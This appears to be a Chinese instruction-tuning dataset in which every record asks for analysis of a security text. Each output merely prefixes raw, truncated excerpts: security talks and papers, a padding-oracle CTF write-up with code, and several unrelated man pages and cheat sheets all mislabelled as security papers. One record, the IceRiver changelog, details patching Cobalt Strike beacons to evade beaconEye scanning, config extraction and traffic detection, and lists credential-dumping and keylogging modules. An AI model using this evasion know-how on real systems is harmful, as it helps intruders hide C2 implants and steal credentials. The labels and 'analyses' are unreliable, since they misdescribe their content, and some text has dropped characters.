{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInvisible Access Opening New Doors to Insecurity Marc Weber Tobias - Matt Fiddler - Tobias Bluzmanis 2009 Security.org Agenda  Standards and Requirements  Electro-Mechanical Locks  Critical Infrastructure and Vulnerabilities  Real World Threats  Case Studies Standards  Why we need Standards  What They Measure  Limited Protocol - Few Tests  Exclude many Real World Attacks  Bumping  Mechanical Bypass  Knowledgeable and Special Attack Techniques - Not Contemplated Standard Security Criteria  Define Conventional vs. High Security  Threat Criteria  Forced Entry  Covert Entry  Key Security  All Standards based upon  Time, Tools and Training Forced Entry UL437 and BHMA 156.30  Locks must be secure against Forced methods of Attack  Attack Resistance 5 Minutes  Excludes many methods of attack Covert Entry Protection  Minimum Security Criteria in UL437 and ANSI/BHMA 156.30  Protects against Certain forms of Covert Entry  Assures Minimum resistance to opening  (10 - 15 minutes)  Picking and Decoding  Master Key Attacks  Bumping (Not Covered) Key Security  Organizational Protection  Duplication of Keys  Keys Ordered by Code  Legal Protection  Availability of Blanks  Does not address Technical Security of Keys  Standards = Limited Security Categories of Locks  Conventional Mechanical Locks  High Security Mechanical Locks  Electronic Credentials  Electro-Mechanical Locks  Electronic Locks  Wired, Wireless, Data on Card Critical Questions  What is SECURITY re: Locks?  Is it secure enough?  What does a High Security rating mean?  The concept of key control, key security and why its important  Can the lock be compromised and how difficult is it?  Real World Threats  Methods to Compromise Conventional Lock Functions  Restrict WHO can enter  Prevent or Delay Unauthorized Access  Low to Medium security  Not Certified  Covert Entry often is easy Conventional Lock Vulnerabilities  Picking, Bumping, Decoding  Impressioning  Master Key Extrapolation  Mechanical Bypass  Failure of Key Contr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBefore the FEDERAL COMMUNICATIONS COMMISSION Washington, DC 20554 In the Matter of Unlicensed Operation in the TV Broadcast Bands Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band ET Docket No. 04-186 ET Docket No. 02-380 COMMENTS OF MOTOROLA, INC. Steve B. Sharkey Director, Spectrum and Standards Strategy Robert D. Kubik Director, Telecom Relations Global Motorola, Inc. 1455 Pennsylvania Avenue, NW Suite 900 Washington, DC 20004 TEL: 202.371.6900 January 31, 2007 Table of Contents Summary.......................................................................................................................................... i I. Background and summary....................................................................................................... 2 II. TV White Space FOR Public Safety AND Other critical Operations..................................... 8 A. TV Channels 14-20................................................................................................. 9 B. Public Safety Priority Access................................................................................ 13 III. Spectrum Access Methods..................................................................................................... 16 IV. Operation of personal/portable devices ................................................................................. 22 V. Conclusion............................................................................................................................. 24 Appendix..................................................................................................................................... A-1 -i- Summary Motorola supports the FCCs general approach to promote use of the TV broadcast bands by unlicensed devices on most of the spectrum occupied by channels below TV channel 52 because it believes that reasonable technical rules can be developed to minimize interference to incumbent operations. The spectru", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993-1994 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: break.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName db", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"START TRANSACTION\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME START TRANSACTION \\- 开始一个事务块 .SH SYNOPSIS .sp .nf START TRANSACTION [ ISOLATION LEVEL { READ COMMITTED | SERIALIZABLE } ] [ READ WRITE | READ ONLY ] .sp .fi .SH \"DESCRIPTION 描述\" .PP 这条命令开始一个新的事务如果声明了隔离级别或者读写模式 那么新事务就使用这个特性如同执行了 SET TRANSACTION [\\fBset_transaction\\fR(7)] 一样在其它方面这条命令的行为和 BEGIN [\\fBbegin\\fR(7)] 命令一样 .SH \"PARAMETERS 参数\" .PP 参阅 SET TRANSACTION [\\fBset_transaction\\fR(7)] 获取有关参数含义的信息 .SH \"COMPATIBILITY 兼容性\" .PP 这条命令兼容 SQL 标准但是又见 SET TRANSACTION [\\fBset_transaction\\fR(7)] 的兼容性小节 .SH \"SEE ALSO 参见\" BEGIN [\\fBbegin\\fR(7)], COMMIT [\\fBcommit\\fR(l)], ROLLBACK [\\fBrollback\\fR(l)], SET TRANSACTION [\\fBset_transaction\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNIST Special Publication 800-207 Zero Trust Architecture Scott Rose Oliver Borchert Stu Mitchell Sean Connelly This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-207 C O M P U T E R S E C U R I T Y NIST Special Publication 800-207 Zero Trust Architecture Scott Rose Oliver Borchert Advanced Network Technologies Division Information Technology Laboratory Stu Mitchell Stu2Labs Stafford, VA Sean Connelly Cybersecurity & Infrastructure Security Agency Department of Homeland Security This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-207 August 2020 U.S. Department of Commerce Wilbur L. Ross, Jr., Secretary National Institute of Standards and Technology Walter Copan, NIST Director and Under Secretary of Commerce for Standards and Technology Authority This publication has been developed by NIST in accordance with its statutory responsibilities under the Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C.  3551 et seq., Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. This guideline is consistent with the requirements of the Office of Management and Budget (OMB) Circular A-130. Nothing in this publication should be taken to contradict the standards and guidelines made mandatory and binding on federal agencies by the Secretary of Commerce under statutory authority. Nor should these guidelines be interpreted as altering or superseding the existing authorities of the Secretary of Commerce, Director of the OMB, or any other federal official. This publication may be used by nongovernmental organizations on a voluntary basis and is not subject to copyright in the United States. Att", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nQuantum Computing 101: How to Crack RSA Walter C. Daugherity Department of Computer Science Texas A&M University BH2002@security.mailshell.com Quantum Computing - Daugherity Biography Walter C. Daugherity is a Senior Lecturer in Computer Science and Electrical Engineering at Texas A&M University. He received a bachelors degree from Oklahoma Christian University, and masters and doctors degrees from Harvard University. His research interests include fuzzy logic, object-oriented programming, and quantum computing. Quantum Computing - Daugherity Biography (Continued) With David A. Church he created the first course in quantum computing at Texas A&M University, which will be offered for the third time in the Fall 2002 semester. Quantum Computing - Daugherity Abstract  What is quantum computing?  How does it work?  Why is it exponentially faster than classical computing?  How can a quantum computer crack RSA? Quantum Computing - Daugherity Quantum Computing  Quantum state = vector in a Hilbert space  Eigenstates |0> and |1> (e.g., spin-up and spin- down of a spin-1/2 particle)  Superposition  Combination w0 |0> + w1 |1>  w = amplitude, w* w = probability of eigenvalue  Interference  Produced by phase angle differences  Constructive or destructive Quantum Computing - Daugherity The Topsy Turvy World of Quantum Computing go to main article How Spin States Can Make Qubits The spin of a particle in a dc magnetic field is analogous to a spinning top that is precessing around the axis of the field. In such a field, the particle assumes one of two states, spin up or spin down, which can represent 0 and 1 in digital logic. A particle in one spin state can be pushed toward another by a radio frequency pulse perpendicular to the magnetic field. A pulse of the right frequency and duration will flip the spin completely [top]. A shorter RF pulse will tip the spin into a superposition of the up and down state [bottom], allowing simultaneous calculations on both states. ---IEEE Spectru", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@EyalItkin Fixed by the vendor ZigBee (Radio) Attacker ZigBee Factory Reset Attacker Controlled WiFi Ethernet ZigBee (Radio) Attacker ZigBee Factory Reset Attacker Controlled WiFi Ethernet ZigBee (Radio) Attacker ZigBee Factory Reset Attacker Controlled WiFi Ethernet Malicious OTA Update ZigBee Exploit WiFi Ethernet Attacker Controlled Attacker ZigBee Exploit WiFi Ethernet Attacker Controlled Attacker Physical (PHY) layer  2.4 GHz Radio Medium Access Control (MAC) Network (NWK) Layer Application Sublayer (APS) ZigBee Device Profile (ZDP) Some Application ZigBee Cluster Library (ZCL) Levels 1-2 IEEE 802.15.4 Levels 3 Levels 4 Levels 5+ Main CPU QCA4531-BL3A ZigBee Modem ATSAMR21E18E Serial Debug  (the bridge) Is using a single huge process that does everything E_ZCL_BOOL (0x10) E_ZCL_UINT8 (0x20) E_ZCL_UINT32 (0x23) E_ZCL_ARRAY (0x48) Yup, this firmware contains symbols! github.com/CheckPointSW/Cyber-Research/tree/master/Vulnerability/Smart_Lightbulbs Goal: Confuse malloc() to allocate a buffer at an arbitrary address @EyalItkin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nname: Comment Docs Preview in PR description: Comment with the docs URL preview in the PR author: Sebastián Ramírez <tiangolo@gmail.com> inputs: token: description: Token for the repo. Can be passed in using {{ secrets.GITHUB_TOKEN }} required: true deploy_url: description: The deployment URL to comment in the PR required: true runs: using: docker image: Dockerfile", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPT与新威胁论坛 2 网络安全威胁中的商业军火 3 从HackingTeam说起 商业化间谍软件现状 商业军火带来的问题 可以采取的应对策略 4 从 说起 成立时间 2003年 创始人 David Vincenzetti(CEO) Valeriano Bedeschi(CIO) 核心人物 Alberto Ornaghi(软件架构师) Marco Valleri(进攻安全管理) 总部 米兰意大利 免费开源 内网安全审计工具 基于MITM实现 第一个面向警方 的商用黑客软件  头像取自领英 Linkedin 5 从 说起 部门 人数 管理 7 行政 9 销售 8 安全 9 运营 15 研发 17 合计 65 6 从 说起 组织名称 国家 区域 最早订单 年费 总收入 智利 拉美 2014 2,289,155 ISO 乌干达 非洲 2015 831,000 2,197,100 CSDN 摩洛哥 非洲 2009 140,000 1,936,050 墨西哥 拉美 2010 130,000 1,390,000 DGST 摩洛哥 非洲 2012 160,000 1,237,500 新加坡 亚洲 2008 89,000 1,209,967 GID Saudi 沙特阿拉伯 非洲 2012 114,000 1,201,000 UAEIntelligence 阿联酋 非洲 2012 150,000 1,200,000 MOD Saudi 沙特阿拉伯 非洲 2013 220,000 1,108,687 SIS 哈萨克斯坦 欧洲 2012 140,000 1,012,500 合同额TOP 10 客户 金额单位EUR 7 从 说起 主要客户分布 8 从 说起 RCS 能力 Windows OSX BlackBerry Windows Mobile Android iOS 9 商业化间谍软件现状 短信息监控 Facebook监控 WhatsApp监控 LINE监控 联系人黑白名单 应用程序监控 应用黑白名单 应用风险状态 通话监控 位置监控 媒体文件监控 Web访问监控 手机开关机记录 10 商业化间谍软件现状 11 商业化间谍软件现状 12 商业化间谍软件现状 多语言界面  有/无图标版本图标可隐藏 安装后在Services中可见 中文界面 安装后无图标 安装后在Services不可见 需要手动激活 13 商业化攻击平台 Cobalt Strike 14 商业化攻击平台 Cobalt Strike 公司/项目/机构 职位 时间 Strategic cyber LLC 创始者和负责人 2012.1-至今 特拉华州空军国民警卫队 领导传统预备役 2009-至今 Cobalt strike 项目负责人 2011.11-2012.5 TDI 高级安全工程师 2010.8-2011.6 Automattic 代码Wrangler 2009.7-2010.8 Feedback Army, After the Deadline 创始人 2008.7-2009.11 美国空军研究实验室 系统工程师 2006.4-2008.3 美国空军 通信与信息 军官 2004.3-2008-3 姓 名Raphael Mudge 教育背景Syracuse University 美国雪城大学密歇根科技大学 目前就职Strategic Cyber LLC战略网络有限责任公司特拉华州空军国民 警卫队 15 商业化攻击平台 Cobalt Strike Packages  HTML Application  Java Application  MS Office Macro  Payload Generator  USB/CD AutoPlay  Windows Dropper  Windows Executable  Windows Executable(S) Web Drive-by  Manage  Auto-Exploit Server  Client-side-Attacks  Clone Site  Firefox Add-on Attack   16 真实案例 APT TOCS 17 真实案例 APT TOCS 18 真实案例 APT TOCS 19 商业军火带来的问题 我们面对怎样的对手 超级病毒超级工厂病毒超级武器 潘多拉的魔盒 利用了微软操作系统中至少4个漏洞其中有3个全新的 零日漏洞为衍生的驱动程序使用有效的数字签名通 过一套完整的入侵和传播流程突破工业专用局域网的 物理限制利用WinCC系统的2个漏洞对其开展破坏 性攻击它是第一个直接破坏现实世界中工业基础设施 的恶意代码据赛门铁克公司的统计目前全球已有约 45000个网络被该蠕虫感染其中60%的受害主机位于 伊朗境内伊", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nln === 用来为文件创建链接 ## 补充说明 **ln命令** 用来为文件创建链接链接类型分为硬链接和符号链接两种默认的链接类型是硬链接如果要创建符号链接必须使用\"-s\"选项 注意符号链接文件不是一个独立的文件它的许多属性依赖于源文件所以给符号链接文件设置存取权限是没有意义的 ### 语法 ```shell ln [选项]... [-T] 目标 链接名 (第一种格式) 或ln [选项]... 目标 (第二种格式) 或ln [选项]... 目标... 目录 (第三种格式) 或ln [选项]... -t 目录 目标... (第四种格式) ``` ### 选项 ```shell --backup[=CONTROL] # 为每个已存在的目标文件创建备份文件 -b # 类似--backup但不接受任何参数 -d, -F, --directory # 创建指向目录的硬链接(只适用于超级用户) -f, --force # 强行删除任何已存在的目标文件 -i, --interactive # 覆盖既有文件之前先询问用户 -L, --logical # 取消引用作为符号链接的目标 -n, --no-dereference # 把符号链接的目的目录视为一般文件 -P, --physical # 直接将硬链接到符号链接 -r, --relative # 创建相对于链接位置的符号链接 -s, --symbolic # 对源文件建立符号链接而非硬链接 -S, --suffix=SUFFIX # 用\"-b\"参数备份目标文件后备份文件的字尾会被加上一个备份字符串预设的备份字符串是符号~用户可通过-S参数来改变它 -t, --target-directory=DIRECTORY # 指定要在其中创建链接的DIRECTORY -T, --no-target-directory # 将LINK_NAME视为常规文件 -v, --verbose # 打印每个链接文件的名称 --help # 显示此帮助信息并退出 --version # 显示版本信息并退出 ``` ### 参数 * 源文件指定链接的源文件如果使用`-s`选项创建符号链接则源文件可以是文件或者目录创建硬链接时则源文件参数只能是文件 * 目标文件指定源文件的目标链接文件 ```shell none, off # 不进行备份(即使使用了--backup 选项) numbered, t # 备份文件加上数字进行排序 existing, nil # 若有数字的备份文件已经存在则使用数字否则使用普通方式备份 simple, never # 永远使用普通方式备份 ``` ### 实例 将目录`/usr/mengqc/mub1` 下的文件 m2.c 链接到目录 `/usr/liu` 下的文件 a2.c ```shell cd /usr/mengqc ln mub1/m2.c /usr/liu/a2.c ``` 在执行ln命令之前目录`/usr/liu`中不存在a2.c文件执行ln之后在`/usr/liu`目录中才有a2.c这一项表明m2.c和a2.c链接起来注意二者在物理上是同一文件利用`ls -l`命令可以看到链接数的变化 **创建软链接** 在目录`/usr/liu`下建立一个符号链接文件abc使它指向目录`/usr/mengqc/mub1` ```shell ln -s /usr/mengqc/mub1 /usr/liu/abc ``` 执行该命令后`/usr/mengqc/mub1`代表的路径将存放在名为`/usr/liu/abc`的文件中 **创建硬链接** 给文件创建硬链接为 `log2022.log` 创建硬链接 `ln2022``log2022.log` 与 `ln2022` 的各项属性相同 ```shell ln log2022.log ln2022 ``` 输出 ``` [root@localhost test]# ll lrwxrwxrwx 1 root root 11 12-07 16:01 link2013 -> log2022.log -rw-r--r-- 1 root bin 61 11-13 06:03 log2022.log [root@localhost test]# ln log2022.log ln2022 [root@localhost test]# ll lrwxrwxrwx 1 root root 11 12-07 16:01 link2013 -> log2022.log -rw-r--r-- 2 root bin 61 11-13 06:03 ln2022 -rw-r--r-- 2 root bin 61 11-13 06:03 log2022.log ``` ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 IceRiver版本Q.V开记录 特性清单 详细信息 修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据,规避爆破脚本扫描 修改beacon配置信息的默认XOR密钥,定程度上规避动化提取CO配置信息 修改配置数据所在堆块的默认值,规避beaconEye扫描 修改HTTP ua头,定程度上规避全流量检测 增加beacon数量统计便统计战果 self inject模式 客户端内置winvnc,避免在TeamServer端上传winvnc dll,便使 修改默认保存的客户端配置件名加密保存登录密码避免被明读取 Change Log 修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据,规避爆破脚本扫描 修改beacon配置信息的默认XOR密钥,定程度上规避动化提取C2配置信息 修改配置数据所在堆块的默认值,规避beaconEye扫描 修改HTTP ua头,定程度上规避全流量检测 增加beacon数量统计便统计战果 self inject模式,通过注beacon规避杀软对注傀儡进程的拦截可规避部分杀软的查杀 持模块:Screenshot,Screenwatch Hashdump,Desktop,Printscreen,ChromeDump,PassTheHash(pth),DcSync,LogonPasswords,Net View(net),KeyLogger,PortScan,PowerShell(powerpick),SSHAgent(ssh,ssh-key),加持第三 插件的身注 客户端内置winvnc,避免在TeamServer端上传winvnc dll,便使 修改默认保存的客户端配置件名加密保存登录密码避免被明读取 特性清单         详细信息 2 从4.4版本的TeamServer java代码中可以知道header头和返回验证成功数据 IDA中搜索 48879定位到位置在 1D5D7B2 位置在 1D5DF0E 分别修改为需要的header值即可需要注意的是不能出现nop指令 修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据, 规避爆破脚本扫描 修改beacon配置信息的默认XOR密钥,定程度上规避动化提取C2配置信息 3 修改件清单 beacon.dll/beacon.rl100k.dll beacon.x64.dll/beacon.x64.rl100k.dll dnsb.dll/dnsb.rl100k.dll dnsb.x64.dll/dnsb.x64.rl100k.dll extc2.dll/extc2.rl100k.dll extc2.x64.dll/extc2.x64.rl100k.dll pivot.dll/pivot.rl100k.dll pivot.x64.dll/pivot.x64.rl100k.dll sshagent.dll/sshagent.x64.dll 在解密配置信息函数fdReason == 1当中可以看到异或0x2E的操作这只需要改默认密钥0x2E即 可同时修改客户端代码beacon/BeaconPayload.java中的beacon_obfuscate函数的异或密钥与 beacon端保持致 修改件清单 beacon.dll/beacon.rl100k.dll beacon.x64.dll/beacon.x64.rl100k.dll dnsb.dll/dnsb.rl100k.dll dnsb.x64.dll/dnsb.x64.rl100k.dll          修改配置数据所在堆块的默认值,规避beaconEye扫描     4 extc2.dll/extc2.rl100k.dll extc2.x64.dll/extc2.x64.rl100k.dll pivot.dll/pivot.rl100k.dll pivot.x64.dll/pivot.x64.rl100k.dll sshagent.dll/sshagent.x64.dll 在申请保存配置信息fdReason == 1的堆内存数据时默认使的0值对堆进初始化这只需要 将0值改为0即可绕过beaconEye扫描 python/java/php/go/curl/wget/windows/linux/mac      修改HTTP ua头,定程度上规避全流量检测 5 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/ 99.0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow we recovered $XXX,000 of Bitcoin from an encrypted zip file Michael Stay, PhD CTO, Pyrofex Corp. DEF CON 2020 Technion - Computer Science Department - Technical Report CS0842 - 1994 ZIP Attacks with Reduced Known Plaintext Michael Stay AccessData Corporation 2500 N. University Ave. Ste. 200 Provo, UT 84606 staym@accessdata.com Abstract. Biham and Kocher demonstrated that the PKZIP stream ci- pher was weak and presented an attack requiring thirteen bytes of plain- text. The deflate algorithm zippers now use to compress the plaintext before encryption makes it difficult to get known plaintext. We consi- der the problem of reducing the amount of known plaintext by finding other ways to filter key guesses. In most cases we can reduce the amo- unt of known plaintext from the archived file to two or three bytes, depending on the zipper used and the number of files in the archive. For the most popular zippers on the Internet, there is a fast attack that does not require any information about the files in the archive; instead, it gets doubly-encrypted plaintext by exploiting a weakness in the pseudorandom-number generator. 1 Introduction PKZIP is a compression / archival program created by Phil Katz. Katz had the foresight to document his file format completely in the file APPNOTE.TXT, distributed with every copy of PKZIP; there are now literally hundreds of zip- per programs available, and the ZIP file format has become a de facto standard on the Internet. In [BK94] Biham and Kocher demonstrated that the PKZIP stream cipher was weak and presented an attack requiring thirteen bytes of plaintext. Eight bytes of the plaintext must be contiguous, and all of the bytes must be the text that was encrypted, which is usually compressed data. [K92] shows that the compression method used at the time, implode, produces many predictable bytes suitable for mounting the attack. Most zippers available today implement only one of the compression methods defined in APPNOTE.TXT, called deflate. Deflat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeanonymizing Tor Nathan S. Evans Christian Grothoff Nathan.S.Evans@du.edu christian@grothoff.org Colorado Research Institute for Security and Privacy University of Denver 1 Motivation  Tor is probably the most popular and widely used free software P2P network used to achieve anonymity on the Internet:  Tor has a strong, large user base  The project is well supported  Generally assumed to give users strong anonymity The news today: All the Tor nodes involved in a circuit can be discoverd, reducing Tor users level of anonymity 2 Tor General Information  Tor stands for The onion router  Encrypts data multiple times and is decrypted as it travels through the network a layer at a time: like peeling an onion  Tor is a low latency P2P mix cascade  Routes data through network along a circuit  Data is encrypted as it passes through nodes (until the last hop) 3 Routing  Data is forwarded through the network  Each node knows only the previous hop and the next hop  Only the originator knows all the hops  Number of hops is hard coded (currently set to three) Key security goal: No node in the path can discover the full path 4 Routing Example Client Server Tor Node 1 Tor Node 2 Tor Node 3 Tor Node 4 Tor Node 5 Tor Node 6 Tor Node 7 Tor Node 8 Tor Node 9 Figure 1: Example showing how a normal path is chosen in the Tor network 5 Previous work  Murdoch and Danezis wrote Low Cost Traffic Analysis of Tor  Goal is to discover all the Tor routers involved in a given circuit  Based on being able to tell the added load of one normal Tor connection  Send a certain sequence down a tunnel, monitor each Tor router to see if it is involved  Their attack worked well with the 2005 Tor network consisting of approximately a dozen Tor routers 6 Problems With Previous Work  Less feasible with 1000+ routers  Must identify all the separate routers in the circuit  Attempting to measure small effects, large fluctuations that occur in actual current network give false positives  We replicated their experiment", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mark is falling down drunk (crypto/web) ## ENG [PL](#pl-version) In the task we get a link for a webpage where someone deployed an application for parsing markdown. There are a couple of example links. We notice that the URL is always the same, but the contains a long hex-string, which probably points to the actual page displayed. If we modify the hex-string the page crashes or gives us `incorrect url` message. This seems like a standard setup for padding oracle attack. We assume that the hex-string is actually AES CBC encrypted data. The first 16 bytes seems to indicate this even more because they are always `deadbeefcafedeadbeefcafe04030201` which seems like a nice IV. So we run our padding oracle attack. For more in depth description of the attack refer to our previous writeups on this. In short we exploit the fact that by manipulating value of previous ciphertext block we can influence the plaintext value or corresponding byte in the next block, directly from the CBC definition. And if we accidentally set the last byte to `\\01` then the decryption will not fail, since this is a proper padding. We can then recover the real value of this last byte because we know that `ciphertext[k-1][n] xor decrypt(ciphertext[k][n])` is now `\\01` and we know the value of `ciphertext[k-1][n]`. We can then proceed to setting last 2 bytes to `\\02\\02` and so on to recover everything. Using our code from crypto commons with: ```python import requests from crypto_commons.symmetrical.symmetrical import oracle_padding_recovery data = 'deadbeefcafedeadbeefcafe0403020131fdd089e91025df9510efa46b2085aac738ae5e03daa6495e2e4ee83283282a5be01dd6d817df2c0e69cd613c7da160a6aab9f02d175ac549feb6b674fa6f65' print(oracle_padding_recovery(data, oracle)) # https://gitlab.com/gitlab-org/gitlab-ce/raw/master/README.md ``` And we do the same for all the links. There is a problem there, because for some reason we can't recover the first block. The server was crashing when there was only one plaintext block", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPSWN PSWN Public Safety Wireless Network Comparisons of Conventional and Trunked Systems May 1999 Comparisons of Conventional and Trunked Systems May 1999 ii FOREWORD Land mobile radio (LMR) networks are critical for public safety communications. In support of the Public Safety Wireless Network (PSWN) Program Management Office (PMO), BoozAllen & Hamilton analyzed conventional, trunked, and hybrid system architectures to provide background information to public safety system planners on the different architecture alternatives. Comparisons of Conventional and Trunked Radio Systems considers typical systems architectures. However, it does not analyze specific vendor systems, implementations, or technical requirements. This report does not reflect a government position or endorse a particular type of LMR network architecture. Comparisons of Conventional and Trunked Systems May 1999 iii TABLE OF CONTENTS PAGE FOREWORD....................................................................................................................II TABLE OF CONTENTS................................................................................................III TABLE OF EXHIBITS ..................................................................................................IV 1.0 INTRODUCTION................................................................................................. 1 2.0 LMR TECHNOLOGY AND ARCHITECTURES............................................ 2 2.1 Brief History of LMR.................................................................................. 2 2.2 Conventional Systems................................................................................. 3 2.3 Techniques for Improving and Extending Area Coverage.......................... 4 2.4 Trunked Systems......................................................................................... 9 2.5 Hybrid Systems ........................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Trello date: 2022-11-23 16:23:31.702599 background: bg-[#417eef] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 29 keyboard shortcuts found on Trello --- Keyboard Shortcuts {.cols-2} ------------------ ### General I Shortcut | Action ---|--- `Up/Down/Left/Right` | Navigate Cards `B` | Open Header Boards Menu `/` | Focus Search Box `C` | Archive Card `D` | Due Date `E` | Quick Edit Mode `Esc` | Close Menu/Cancel Editing `Ctrl` `Enter` | Save Text `Enter` | Open Card `F` | Open Card Filter Menu `L` | Label `;` | Toggle Label Names `M` | Add/Remove Members `N` | Insert New Card `,/./</>` | Move Card to Adjacent List {.shortcuts} ### General II Shortcut | Action ---|--- `Q` | My Cards Filter `S` | Watch `Space` | Assign Self `T` | Edit Title `V` | Vote `W` | Toggle Board Menu `X` | Clear All Filters `?` | Open Shortcuts Page `Shift` `2` | Autocomplete Members `Shift` `3` | Autocomplete Labels `Shift` `6` | Autocomplete Position `Ctrl` `C` | Copy Card `Ctrl` `V` | Paste Card `Ctrl` `X` | Move Card {.shortcuts} Also see -------- - [Keyboard shortcuts for Trello](https://trello.com/shortcuts) _(trello.com)_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MD5 ## 基本描述 MD5的输入输出如下 - 输入任意长的消息512比特长的分组 - 输出128比特的消息摘要 关于详细的介绍请自行搜索 此外有时候我们获得到的md5是16位的其实那16位是32位md5的长度是从32位md5值来的是将32位md5去掉前八位去掉后八位得到的 一般来说我们可以通过函数的初始化来判断是不是MD5函数一般来说如果一个函数有如下四个初始化的变量可以猜测该函数为MD5函数因为这是MD5函数的初始化IV ``` 0x674523010xEFCDAB890x98BADCFE0x10325476 ``` ## 破解 目前可以说md5已经基本被攻破了一般的MD5的碰撞都可以在如下网上获取到 - http://www.cmd5.com/ - http://www.ttmd5.com/ - http://pmd5.com/ - https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip (生成指定前缀的md5碰撞) ## 题目 - CFF 2016 好多盐 - JarvisOJ 好多盐", "category": "text_analysis", "source": "security_papers"}
